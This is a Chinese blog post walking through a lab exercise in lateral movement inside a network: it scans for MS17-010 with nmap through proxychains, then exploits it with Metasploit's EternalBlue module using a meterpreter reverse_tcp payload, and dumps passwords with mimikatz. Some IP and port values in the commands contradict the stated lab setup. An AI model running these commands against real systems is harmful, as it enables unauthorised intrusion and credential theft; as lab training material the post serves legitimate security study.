【内网横向移动】使用nmap 和msfconsole 进行ms17_010漏洞扫描及利用

最新推荐文章于 2024-09-26 16:00:09 发布
最新推荐文章于 2024-09-26 16:00:09 发布
阅读量3.6k 收藏 21
点赞数 3
分类专栏: 内网渗透 工具使用 文章标签: 安全 nmap 信息安全 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45588247/article/details/109576498
版权

实验环境:

攻击(攻击者)主机:          :

Kali2020.2    虚拟机      

                   

192.168.254.132                               

目标(跳板机)主机:        

Windows2008 虚拟机          

Nat    

vmnet1       

192.168.254.176                               

192.168.10.12                                      

目标主机

Windows2007 虚拟机

Vmnet1

192.168.10.11  

nmap

查看漏洞探测的脚本,

【命令】

cd /usr/share/nmap/script //进入脚本目录下
ls | grep vuln   //查找vuln漏洞脚本,找到ms17-010漏洞脚本

 

使用smb-vuln-ms17-010.nse对192.168.10.12进行漏洞扫描,出现以下界面说明有漏洞,

【命令】这里使用的是socks进行代理进行连接的:

proxychains nmap -sT -p 445 --script=smb-vuln-ms17-010.nse 192.168.10.12
//使用smb-vuln-ms17-010.nse对192.168.10.12进行漏洞扫描,出现以下界面说明有漏洞

 

 

 

msfconsole 

 

查看漏洞扫描模块:

【命令】

proxychains msfconsole   //使用proxychains代理启动msfconsole
search scanner或search 17_010  //search搜索相应的模块

代理服务器已经开启了,

 

进行漏洞探测,

【命令】

use auxiliary/scanner/smb/smb_ms17_010  //使用smb_ms17_010模块
show options //查看需要设置的选项
set rhosts 192.168.10.1/24  //对整个ip段进行扫描
set threads 10  //设置线程,这里为10个线程
exploit   //开始进行扫描

 

使用攻击模式进行攻击,

【命令】

use exploit/windows/smb/ms17_010_eternalblue  //使用ms17_010_eternalblue攻击模块进行攻击
set payload windows/x64/meterpreter/reverse_tcp  //使用攻击载荷
set rhost 172.16.10.11   //内网中的另一台主机win7,一般win7旗舰版可以攻击成功
set lhost 192.168.100.128  //设置本机监听
set lport 555  //设置本机监听端口为5555
exploit  //进行攻击
//注意,攻击成功会返回目标主机的meterpreter 的shell权限,获得meterpreter后,进行以下操作:
getuid   // 查看当前用户
load mimikatz   //加载mimikaz
mimikatz_command   //使用mimikaz
kerberos   //使用kerberos可以对系统密码进行抓取
//单独输入一个?可以查看用法

 

剑客 getshell
关注
专栏目录
内网渗透系列之Pivoting跳板攻击与自动路由的配置以及使用ProxyChains进行代理扫描并获取内网服务器权限
lza20001103的博客
09-04 2200
Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限 文章目录Pivoting跳板攻击与自动路由的配置使用以及ProxyChains进行代理扫描并获取内网服务器权限前言msf反弹shell配置路由存活主机探测端口扫描后记 前言 相信大家在内网渗透过程中都会遇到,进入内网后,无法访问内网页面的情况,这是我们就需要配置路由信息,访问内网页面,然后设置socks4代理进行扫描端口的信息,进而利用相关端口,利用相关的漏洞信息,进行漏洞利用,获取靶机的权限。这就是内网
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 488
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Kali学习 | 漏洞利用:4.2 控制 Metasploit 终端 MSFCONSOLE
qq_43233085的博客
12-28 922
Kali学习 | 漏洞利用:4.2 控制 Metasploit 终端 MSFCONSOLEMSFCONSOLE 介绍MSFCONSOLE 漏洞利用 MSFCONSOLE 介绍 MSF终端(MSFCONSOLE)是目前Metasploit框架最为流行的用户接口,而且也是非常灵活的。 因为MSF终端是Metasploit框架中最灵活、功能最丰富及支持最好的工具之一。MSFCONSOLE 主要用于管理M...
Metasploit系列----nmap结果导入msf
bronze_s的博客
06-13 647
环境 攻击机器:kali linux:192.168.1.7 靶机:windows10:192.168.1.6 在kali中使用nmapwindows进行扫描 nmap -A -v -T4 192.168.1.6 -oX scan.xml 将扫描结果保存在scan.xml中 扫描结束后,使用ls查看,已经生成scan.xml文件 使用cat scan.xml 查看文件,里边是扫描结果信息。 将scan.xml 导入msf 在命令终端使用命令 msfconsole 打开msf 使用db_import 文件
2024NMAP 安装保姆级教程(超详细)Nmap的介绍、功能并进行网络扫描,收藏这一篇就够了!!!
最新发布
2301_77472496的博客
09-26 1464
从诞生之初,Nmap就一直是网络发现和攻击界面测绘的首选工具。从主机发现和端口扫描,到操作系统检测和IDS规避/欺骗,Nmap是大大小小黑客行动的基本工具。
msfconsole漏洞扫描工具详解
有勇气的牛排博客
07-24 7206
目录1 msfconsole 介绍 1 msfconsole 介绍 msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一个一体化的集中控制台,通过msfconsole,你可以访问和使用所有的metaslopit插件,payload,利用模块,post模块等等。msfconsole还有第三方程序的接口,比如nmap、sqlmap等,可以直接在msfconsole里面使用。 kali可直接在命令使用msfconsole Msfconsole的系统
MSF进行基本的漏洞扫描
Ethan024的博客
06-02 1330
监听目标服务器的80端口,并发送一个GET HTTP请求: kali@kali:~$ nc 192.168.168.228 80 get http 此时目标服务器会提供该端口上运行的Web服务器系统。
msf扫描服务器漏洞,并发现漏洞对系统的入侵
b312738566的博客
10-20 1659
学会利用扫描工具来扫描服务器的漏洞,并通过发现的漏洞对系统进行入侵,上传木马并远程控制服务器,学生通过实验感性认识黑客入侵。工具软件:metasploit、windows系统、木马启动Msfconsole
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
7. **网络模式调整**:在某些阶段,如利用ms17_010,可能需要将虚拟机网络模式切换至NAT,以便模拟内网环境。 8. **实验环境要求**:实验硬件配置要求较低,单核CPU、2GB内存、30GB硬盘即可,但需保证网络环境支持...
Metasploit内网渗透与横向移动的实战案例
内网渗透测试是企业信息安全评估的重要环节,通过模拟黑客攻击的方式,发现系统漏洞和弱点,提前做好安全防护工作,保障企业信息安全。 ## 1.2 内网渗透的风险和挑战 内网渗透具有较高的风险和挑战,一旦黑客入侵...
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
sinat_27757177的博客
10-17 5199
永恒之蓝漏洞复现(包括常见问题处理)和修复方案
使用MSF Console实现MS17-010漏洞利用
Fng的博客
03-30 1522
使用Kali的Metasploit Console(MSF Console)工具实现Windows 7 Professional下MS17-010(永恒之蓝)漏洞利用
【常用工具】MSF使用教程(一)漏洞扫描利用(以永恒之蓝漏洞复现为例)_msf漏洞扫描
2201_75735270的博客
03-29 4121
背景:永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
怎么将nmap扫描记录导入进msf
m0_73765543的博客
12-23 309
如何将nmap扫描记录导入进msf
metasploit中msfconsole使用教程,永恒之蓝漏洞复现
qq_47289634的博客
03-13 2530
msfconsole是metasploit中的一个工具,msfconsole集成了很多漏洞的利用的脚本,永恒之蓝是在 Windows 发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
nmap检测ms17-010的配置与使用方法
weixin_34233421的博客
05-17 1728
1前言针对近期肆虐全球的“永恒之蓝”勒索蠕虫病毒,为有效预防病毒的***,将被病毒***后的损失降到最低,各单位均采取了相关应急处置办法,但没有方法验证处置办法是否行之有效。很幸运的是,Paulino Calderon在https://github.com/提供了ms17-010nmap检测脚本。2升级或安装nmap最新版本到官方网站下载nmap最新...
结合nmap和Metasploit对目标端口扫描
qq_43776408的博客
10-27 492
结合之前你需要启动postgresql数据库 /etc/init.d/postgresql start db_connect postgresql:toor@127.0.0.1/msf db_status 最后出现connected表示成功 然后db_nmap -sS -A 192.168.3.12 这样就会把扫描结果导入数据库中了 之前还讲了一种关于将nmap结果导入数据库 我建议大家用这...
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 5527
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
Windows网络服务渗透测试实战MS17-010漏洞复现
c_lanxiaofang的博客
05-16 3577
一、实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二、实验目的及要求 熟悉Metasploit终端的使用方法; 掌握对MS17-010漏洞攻击的方法。 三、复现步骤(附加文字说明加截图) 1、NAT模式 Kali-Linux :192.168.232.141 Windows 7: 192.168.232.142 2、查看ip kali:ip a win7:ipconfig 3、重启网卡 service networking restart 4、测试是否连通 k
使用nmap进行漏洞扫描
09-22
使用nmap进行漏洞扫描的步骤如下: 1. 打开终端并输入nmap命令,以查看nmap工具的所有参数。 2. 使用nmap命令扫描目标网站的开放端口,例如:nmap www.xxx.com。 3. 运行带有漏洞脚本的nmap命令,以扫描目标网站存在的漏洞,例如:nmap -sv -p端口 --script=vulners(或者vuln)www.xxx.com。 4. 分析扫描结果,查看是否存在CVE漏洞或SQL漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值